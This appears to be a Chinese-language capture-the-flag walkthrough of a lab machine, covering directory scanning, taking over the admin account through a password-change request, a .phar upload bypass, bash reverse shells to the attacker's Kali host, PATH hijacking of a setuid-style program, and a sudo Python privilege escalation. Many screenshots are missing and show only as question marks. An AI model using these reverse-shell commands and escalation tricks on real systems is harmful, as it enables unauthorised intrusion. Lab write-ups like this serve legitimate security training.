0x001 信息收集
kali ip : 192.168.181.129
靶机 ip :192.168.181.141
首先进行ip扫描
?对端口进行扫描
?开启了22和80端口
发现端口进行探测没有漏洞可以利用,于是我打开网页
?于是我进行查看源码
于是发现一个login.php的文件,这可能有提示
?于是进行目录扫描
gobuster dir -u http://192.168.181.141/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x html,php,bak,txt
?在http://192.168.181.141/upload/发现一张图片
?于是下载到本地,一开始以为有隐写,尝试多次没有成功,后来还是打开login.php的页面
在login.php页面我可以进行注册并登录
0x002 网页渗透
于是我对修改密码的操作进行抓包,当我们看到id为7,那么我猜测1是不是就是admin用户呢
密码修改成功
?于是使用admin进行登录
?于是我上传php的文件
?没有上传成功,于是我将其后缀改为‘.phar’
?文件上传成功,将其运行,并在kali上使用netcat进行监听
?于是进行外壳反弹
bash -c 'bash -i >& /dev/tcp/192.168.181.129/9999 0>&1'
?于是在/home/john发现一个属组是www-data用户的
?于是进行查看
?于是我发现一个ssh密钥
?于是在kali上生成ssh密钥
ssh-keygen -b 2048 -f key
于是在kali上打开http服务
python3 -m http.server 9999
?并删除靶机上的密钥
?于是将我们生成的密钥下载到目录下
于是我使用ssh进行登录john账号,但是没有成功
但是我发现export可以运行
cd /tmp
echo bash > id
chmod 777 id
export PATH=/tmp:$PATH
echo $PATH
cd /home/john
./toto
?于是再次进行外壳反弹
bash -c 'bash -i >& /dev/tcp/192.168.181.129/5555 0>&1'
?于是我查看了john的密码
?于是进行ssh登录
?
?于是获得第一个flag
?0x003 提权
于是我对file.php进行编辑
?
?于是运行file.php
sudo /usr/bin/python3 /home/john/file.py
?
?上面说我们可以提权,于是我进行修改
?再次运行file.py
?于是获得最终flag
?